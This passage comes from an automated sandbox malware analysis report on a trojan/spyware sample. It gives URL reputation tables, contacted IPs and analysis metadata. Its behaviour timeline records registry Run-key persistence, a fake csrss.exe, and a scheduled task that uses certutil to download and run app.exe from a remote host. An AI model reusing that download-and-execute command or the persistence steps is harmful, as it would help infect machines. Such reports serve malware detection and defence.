            https://pc.inappP | 0% | Avira URL Cloud | safe
            http://www.jiyu-kobo.co.jp/G.F | 0% | Avira URL Cloud | safe
            http://www.fontbureau.comh% | 0% | Avira URL Cloud | safe
            https://fotamene.cominvalid | 0% | Avira URL Cloud | safe
            http://.css | 0% | Avira URL Cloud | safe
            https://awesomepools.space/fees.php#pictureBox1.Image | 0% | Avira URL Cloud | safe
            http://www.jiyu-kobo.co.jp/Y0TTF | 0% | Avira URL Cloud | safe
            http://kwq950.online | 0% | Avira URL Cloud | safe
            http://r3.i.lencr.org/0 | 0% | URL Reputation | safe
            http://www.sajatypeworks.com | 0% | URL Reputation | safe
            http://r3.i.lencr.org/0/ | 0% | Avira URL Cloud | safe
            http://devlog.gregarius.net/docs/ua)Links | 0% | Avira URL Cloud | safe
            http://ocsp.rootg2.amazontrust.com08 | 0% | URL Reputation | safe
            http://www.founder.com.cn/cnya | 0% | Avira URL Cloud | safe
            http://www.trustedlogos.com/8http://www.trustedlogos.com/8http://www.trustedlogos.com/ | 0% | Avira URL Cloud | safe
            https://sndvoices.comhttps://2makestorage.comhttps://sndvoices.comhttps://2makestorage.comMicrosoft | 0% | Avira URL Cloud | safe
            http://www.founder.com.cn/cnu | 0% | Avira URL Cloud | safe
            http://r3.o.lencr.org0 | 0% | URL Reputation | safe
            http://www.sakkal.com | 0% | URL Reputation | safe
            http://.jpg | 0% | Avira URL Cloud | safe
            https://2makestorage.comidna: | 0% | Avira URL Cloud | safe
            http://s.ss2.us/r.crl0 | 0% | URL Reputation | safe
            http://cps.root-x1.letsencrypt.org0 | 0% | URL Reputation | safe
            https://new.multitimer.fun/eula | 0% | Avira URL Cloud | safe
            https://pc.inappapiurl.com | 0% | Avira URL Cloud | safe
            http://www.innosetup.com/ | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/jp | 0% | Avira URL Cloud | safe
            http://www.sajatypeworks.como | 0% | Avira URL Cloud | safe
            https://digitalassets.ams3.digitaloceanspaces.com8 | 0% | Avira URL Cloud | safe
            https://pc.inappapiurl.com/api/v1/buying/redirect/30601988b56f78c9.53290271?sub_id_1=102&sub_id_2=&s | 0% | Avira URL Cloud | safe
            http://cps.letsencrypt.org0 | 0% | URL Reputation | safe
            https://noteach.tech/software.php?client= | 0% | Avira URL Cloud | safe
            http://ocsp.di | 0% | Avira URL Cloud | safe
            http://www.trustedlogos.com/A | 0% | Avira URL Cloud | safe
            http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe
            http://apps.ide7m | 0% | Avira URL Cloud | safe
            http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe
            http://www.jiyu-kobo.co.jp/F | 0% | URL Reputation | safe
            http://nvidsame.com/app/app.exe | 100% | Avira URL Cloud | malware
            http://www.founder.com.cn/cnnoig | 0% | Avira URL Cloud | safe
            https://noteach.tech/add.php?windows= | 0% | Avira URL Cloud | safe
            http://en.w | 0% | URL Reputation | safe
            http://james.newtonking.com/projects/json | 0% | URL Reputation | safe
            http://https://_bad_pdb_file.pdb | 0% | Avira URL Cloud | safe
            http://crl.rootg2.amazontrust.com/rootg2.crl0 | 0% | URL Reputation | safe
            https://sndvoices.comimage: | 0% | Avira URL Cloud | safe
            http://www.founder.com.cn/cn | 0% | URL Reputation | safe
            https://new.multitimer.fun/marketing/creative/windows/offer_screen/default?mode=click&track_id=3 | 0% | Avira URL Cloud | safe
            https://new.multitimer.fun/privacy | 0% | Avira URL Cloud | safe
            https://pc.inappapiurl.com/api/v1/buying/redirect/ | 0% | Avira URL Cloud | safe
            http://newscommer.com/app/app.exe | 100% | Avira URL Cloud | malware
            http://o.ss2.us/0 | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
            http://www.sajatypeworks.comrsivoi | 0% | Avira URL Cloud | safe
            https://blockchain.infoindex | 0% | Avira URL Cloud | safe
            http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            https://new.multitimer.fun | multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://html4/loose.dtd | tpwlxkeo40z.exe, tpwlxkeo40z.exe, 0000000F.00000000.724251441.00000000003A2000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
            https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | installer.exe, 00000012.00000002.804792262.0000000000401000.00000020.00020000.sdmp | false | | high
            https://s3.amazonaws.com/malapps/multitimer.exe | multitimer.exe, 00000002.00000002.669285433.0000000002BC6000.00000004.00000001.sdmp, multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmp | false | | high
            https://api.googlrapis.com/installer/ | installer.exe, 00000012.00000003.731180992.00000000024C0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            https://digitalassets.ams3.digitaloceanspaces.comx | SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648721404.0000000002C60000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.760206850.000000000263F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            https://pc.inappapiurl.com/api/v1/tracking/buying | multitimer.exe, 00000002.00000002.669376413.0000000002C2A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.jiyu-kobo.co.jp/jp/H | AwesomePoolE1.exe, 00000010.00000003.761458989.000000001D006000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://crt.rootg2.amazontrust.com/rootg2.cer0= | multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://digitalassets.ams3.digitaloceanspaces.com | SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648727903.0000000002C6B000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.761859956.000000000264A000.00000004.00000001.sdmp | false | | high
            http://www.trustedlogos.com/ | installer.exe, 00000012.00000003.802572245.0000000002381000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            https://pc.inappP | multitimer.exe, 00000004.00000003.794172433.00000000039CA000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            https://digitalassets.ams3.digitaloceanspaces.com | SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648662757.0000000002BD1000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.758551056.0000000002632000.00000004.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.757258767.00000000029A2000.00000004.00000001.sdmp | false | | high
            http://www.jiyu-kobo.co.jp/G.F | AwesomePoolE1.exe, 00000010.00000003.760937918.000000001D006000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            https://digitalassets.ams3.digitaloceanspaces.com/cstadmo/setups.exe | tpwlxkeo40z.exe, 0000000F.00000002.757060720.0000000002901000.00000004.00000001.sdmp | false | | high
            https://digitalassets.ams3.digitaloceanspaces.com/hahaza/Visual19.exe.config | SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648757628.0000000002CA3000.00000004.00000001.sdmp | false | | high
            http://www.fontbureau.comh% | AwesomePoolE1.exe, 00000010.00000003.767975089.000000001D006000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
            http://www.google.ru/?hl=ru&q=illegal | app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp | false | | high
            http://www.fontbureau.com/designers | AwesomePoolE1.exe, 00000010.00000003.770158331.000000001D014000.00000004.00000001.sdmp, AwesomePoolE1.exe, 00000010.00000003.766514791.000000001D00D000.00000004.00000001.sdmp | false | | high
            https://fotamene.cominvalid | app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp | false | Avira URL Cloud: safe | unknown
            http://.css | tpwlxkeo40z.exe, tpwlxkeo40z.exe, 0000000F.00000000.724251441.00000000003A2000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
            https://awesomepools.space/fees.php#pictureBox1.Image | AwesomePoolE1.exe, 00000010.00000000.723831514.0000000000652000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.jiyu-kobo.co.jp/Y0TTF | AwesomePoolE1.exe, 00000010.00000003.761458989.000000001D006000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            https://digitalassets.ams3.digitaloceanspaces.com/hahaza/Visual19.exe0y | SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648662757.0000000002BD1000.00000004.00000001.sdmp | false | | high
            https://jrsoftware.org/ishelp/index.php?topic=setupcmdline | installer.exe | false | | high
            http://kwq950.online | multitimer.exe, 00000004.00000003.838097111.000000000395A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            https://digitalassets.ams3.digitaloceanspaces.com/hahaza/Visual19.exe.config0y | SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648757628.0000000002CA3000.00000004.00000001.sdmp | false | | high
            http://r3.i.lencr.org/0 | multitimer.exe, 00000002.00000002.668263089.0000000000B9D000.00000004.00000020.sdmp, multitimer.exe, 00000004.00000003.694786238.0000000001053000.00000004.00000001.sdmp, multitimer.exe, 0000000B.00000003.889954389.0000000000A88000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.sajatypeworks.com | AwesomePoolE1.exe, 00000010.00000003.748742620.000000001D007000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            https://s3.amazonaws.com | multitimer.exe, 00000002.00000002.669376413.0000000002C2A000.00000004.00000001.sdmp | false | | high
            http://r3.i.lencr.org/0/ | multitimer.exe, 00000004.00000003.898077753.000000001D5E9000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://devlog.gregarius.net/docs/ua)Links | app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp | false | Avira URL Cloud: safe | unknown
            http://ocsp.rootg2.amazontrust.com08 | multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.founder.com.cn/cnya | AwesomePoolE1.exe, 00000010.00000003.756257315.000000001D006000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.trustedlogos.com/8http://www.trustedlogos.com/8http://www.trustedlogos.com/ | installer.exe, 00000012.00000003.731180992.00000000024C0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            https://sndvoices.comhttps://2makestorage.comhttps://sndvoices.comhttps://2makestorage.comMicrosoft | app.exe, 00000013.00000002.878710201.00000000144B0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.founder.com.cn/cnu | AwesomePoolE1.exe, 00000010.00000003.756257315.000000001D006000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://r3.o.lencr.org0 | multitimer.exe, 00000002.00000002.668263089.0000000000B9D000.00000004.00000020.sdmp, multitimer.exe, 00000004.00000003.898077753.000000001D5E9000.00000004.00000001.sdmp, multitimer.exe, 0000000B.00000003.889954389.0000000000A88000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            https://turnitin.com/robot/crawlerinfo.html)couldn | app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp | false | | high
            http://search.msn.com/msnbot.htm)multipart/form-data | app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp | false | | high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648662757.0000000002BD1000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.758551056.0000000002632000.00000004.00000001.sdmp | false | | high
            http://www.sakkal.com | AwesomePoolE1.exe, 00000010.00000003.762372067.000000001D03D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            https://digitalassets.ams3.digitaloceanspaces.com/cstadmo/tsac/CasterUninstaller.exe | 2mqvpn30gyk.exe, 0000000E.00000002.753969283.00000000025F1000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.820645486.00000000127E2000.00000004.00000001.sdmp | false | | high
            http://.jpg | tpwlxkeo40z.exe, tpwlxkeo40z.exe, 0000000F.00000000.724251441.00000000003A2000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
                                            https://2makestorage.comidna:app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://s.ss2.us/r.crl0multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://digitalassets.ams3.digitaloceanspaces.com/cstadmo/tsac/Caster.exeL2mqvpn30gyk.exe, 0000000E.00000002.742226663.0000000000967000.00000004.00000020.sdmpfalse
                                              high
                                              http://cps.root-x1.letsencrypt.org0multitimer.exe, 00000002.00000002.668263089.0000000000B9D000.00000004.00000020.sdmp, multitimer.exe, 00000004.00000003.898077753.000000001D5E9000.00000004.00000001.sdmp, multitimer.exe, 0000000B.00000003.889954389.0000000000A88000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://new.multitimer.fun/eulamultitimer.exe, 00000002.00000002.669285433.0000000002BC6000.00000004.00000001.sdmp, multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://pc.inappapiurl.commultitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.innosetup.com/installer.exe, 00000012.00000003.753049587.000000007FC30000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.comAwesomePoolE1.exe, 00000010.00000003.770340667.000000001D006000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.jiyu-kobo.co.jp/jpAwesomePoolE1.exe, 00000010.00000003.761458989.000000001D006000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.sajatypeworks.comoAwesomePoolE1.exe, 00000010.00000003.748742620.000000001D007000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://digitalassets.ams3.digitaloceanspaces.com8SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648757628.0000000002CA3000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.765258818.0000000002682000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://pc.inappapiurl.com/api/v1/buying/redirect/30601988b56f78c9.53290271?sub_id_1=102&sub_id_2=&smultitimer.exe, 00000002.00000002.669112631.0000000002B34000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://cps.letsencrypt.org0multitimer.exe, 00000002.00000002.668263089.0000000000B9D000.00000004.00000020.sdmp, multitimer.exe, 00000004.00000003.898077753.000000001D5E9000.00000004.00000001.sdmp, multitimer.exe, 0000000B.00000003.889954389.0000000000A88000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://digitalassets.ams3.digitaloceanspaces.com/cstadmo/tsac/Caster.exe2mqvpn30gyk.exe, 0000000E.00000002.753969283.00000000025F1000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.820645486.00000000127E2000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://noteach.tech/software.php?client=AwesomePoolE1.exe, 00000010.00000000.723831514.0000000000652000.00000002.00020000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://ocsp.ditpwlxkeo40z.exe, 0000000F.00000002.755015942.0000000000A0D000.00000004.00000020.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://search.msn.com/msnbot.htm)msnbot/1.1app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpfalse
                                                    high
                                                    http://www.trustedlogos.com/Ainstaller.exe, 00000012.00000003.802572245.0000000002381000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpfalse
                                                      high
                                                      http://apps.ide7mmultitimer.exe, 00000004.00000003.716904021.000000001BBAF000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://ocsp.rootca1.amazontrust.com0:multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/FAwesomePoolE1.exe, 00000010.00000003.761458989.000000001D006000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://nvidsame.com/app/app.exemultitimer.exe, 00000004.00000003.794172433.00000000039CA000.00000004.00000001.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.founder.com.cn/cnnoigAwesomePoolE1.exe, 00000010.00000003.756257315.000000001D006000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://digitalassets.ams3.digitaloceanspaces.com/hahaza/Visual19.exeSecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648662757.0000000002BD1000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://noteach.tech/add.php?windows=AwesomePoolE1.exe, 00000010.00000000.723831514.0000000000652000.00000002.00020000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://en.wAwesomePoolE1.exe, 00000010.00000003.745346182.000000001CFFB000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://james.newtonking.com/projects/jsonmultitimer.exe, 00000008.00000002.802510935.000000001BD90000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://https://_bad_pdb_file.pdbapp.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        low
                                                        http://www.search.com/web?q=invalidapp.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpfalse
                                                          high
                                                          http://crl.rootg2.amazontrust.com/rootg2.crl0multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://sndvoices.comimage:app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.founder.com.cn/cnAwesomePoolE1.exe, 00000010.00000003.756257315.000000001D006000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://new.multitimer.fun/marketing/creative/windows/offer_screen/default?mode=click&amp;track_id=3multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://new.multitimer.fun/privacymultitimer.exe, 00000002.00000002.669285433.0000000002BC6000.00000004.00000001.sdmp, multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://pc.inappapiurl.com/api/v1/buying/redirect/multitimer.exe, 00000002.00000002.669011505.0000000002AAE000.00000004.00000001.sdmp, multitimer.exe, 00000003.00000002.682573139.0000000002777000.00000004.00000001.sdmp, multitimer.exe, 00000008.00000002.739832286.00000000034D7000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://newscommer.com/app/app.exeapp.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://o.ss2.us/0multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/AwesomePoolE1.exe, 00000010.00000003.761458989.000000001D006000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.sajatypeworks.comrsivoiAwesomePoolE1.exe, 00000010.00000003.748742620.000000001D007000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://blockchain.infoindexapp.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.sajatypeworks.coma-dAwesomePoolE1.exe, 00000010.00000003.748742620.000000001D007000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://pc.inappPj2multitimer.exe, 00000004.00000003.803292632.0000000003ADA000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://new.multitimer.fun/marketing/creative/windows/offer_screen/default?mode=click&track_id=3.161multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.avantbrowser.com)MOT-V9mm/00.62app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          low
                                                          http://x.ss2.us/x.cer0&multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.onclickmax.com/script/preurl.php?r=1590229&sub1=9multitimer.exe, 0000000B.00000003.889954389.0000000000A88000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.remobjects.com/psinstaller.exe, 00000012.00000003.753049587.000000007FC30000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers/AwesomePoolE1.exe, 00000010.00000003.766400864.000000001D00D000.00000004.00000001.sdmpfalse
                                                              high

                                                              Contacted IPs

                                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.51.246.83 | unknown | Ukraine | 21100 | ITLDC-NLUA | false
104.21.66.43 | unknown | United States | 13335 | CLOUDFLARENETUS | false
212.86.114.14 | unknown | Ukraine | 204601 | ON-LINE-DATAServerlocation-NetherlandsDrontenNL | false
1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | false
13.226.175.13 | unknown | United States | 16509 | AMAZON-02US | false
52.217.79.150 | unknown | United States | 16509 | AMAZON-02US | false
94.130.16.32 | unknown | Germany | 24940 | HETZNER-ASDE | false
5.101.110.225 | unknown | Netherlands | 14061 | DIGITALOCEAN-ASNUS | false
167.179.116.92 | unknown | United States | 20473 | AS-CHOOPAUS | false
8.8.8.8 | unknown | United States | 15169 | GOOGLEUS | false
54.228.245.175 | unknown | United States | 16509 | AMAZON-02US | false
46.51.175.4 | unknown | Ireland | 16509 | AMAZON-02US | false
138.197.53.157 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | false
104.248.119.44 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | false
13.226.175.127 | unknown | United States | 16509 | AMAZON-02US | false
139.180.202.218 | unknown | United States | 20473 | AS-CHOOPAUS | false
185.154.14.180 | unknown | Ukraine | 21100 | ITLDC-NLUA | false

                                                              Private

                                                              IP
                                                              192.168.2.1

                                                              General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 352870
Start date: 15.02.2021
Start time: 00:54:15
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 16m 28s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.15941 (renamed file extension from 15941 to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@75/48@0/18
EGA Information: Failed
HDC Information:
• Successful, ratio: 8.2% (good quality ratio 7.6%)
• Quality average: 71.7%
• Quality standard deviation: 28.7%
HCA Information:
• Successful, ratio: 57%
• Number of executed functions: 325
• Number of non-executed functions: 1
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe
• Report creation exceeded maximum time and may have missing behavior and disassembly information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                                              Simulations

                                                              Behavior and APIs

Time      Type             Description
00:55:03  API Interceptor  1x Sleep call for process: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe modified
00:55:12  API Interceptor  18x Sleep call for process: multitimer.exe modified
00:55:19  Autostart        Run: HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce xbavmnzo2cn "C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe" 1 3.1613346908.6029b85c957f5
00:55:37  Autostart        Run: HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce giyjgogyiys "C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe" 1 3.1613346908.6029b85c957f5
00:55:41  API Interceptor  2x Sleep call for process: vkfgkd5pxm1.exe modified
00:55:47  API Interceptor  1x Sleep call for process: 2mqvpn30gyk.exe modified
00:55:49  API Interceptor  1x Sleep call for process: g5qbddy2kmz.exe modified
00:55:52  API Interceptor  1x Sleep call for process: tpwlxkeo40z.exe modified
00:55:53  API Interceptor  2x Sleep call for process: 5asqork1n2b.exe modified
00:55:58  API Interceptor  1x Sleep call for process: AwesomePoolE1.exe modified
00:56:03  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 3348551 "C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exe" /VERYSILENT
00:56:08  Task Scheduler   Run new task: csrss path: C:\Windows\rss\csrss.exe
00:56:09  Task Scheduler   Run new task: ScheduledUpdate path: cmd.exe s>/C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\user\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\user\AppData\Local\Temp\csrss\scheduled.exe /31340
00:56:14  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WeatheredFirefly "C:\Windows\rss\csrss.exe"
00:56:16  API Interceptor  1x Sleep call for process: uhmrme5g5sj.exe modified
00:56:29  API Interceptor  2x Sleep call for process: app.exe modified
00:56:36  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 8694976 "C:\Users\user\AppData\Roaming\ws1zxlbl2rs\tvnd2nml2ch.exe" /VERYSILENT
00:56:53  Autostart        Run: HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce s3ha54cpcng "C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe" 1 3.1613346908.6029b85c957f5
00:57:02  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 3348551 "C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exe" /VERYSILENT
00:57:11  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WeatheredFirefly "C:\Windows\rss\csrss.exe"
00:57:20  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 8694976 "C:\Users\user\AppData\Roaming\ws1zxlbl2rs\tvnd2nml2ch.exe" /VERYSILENT
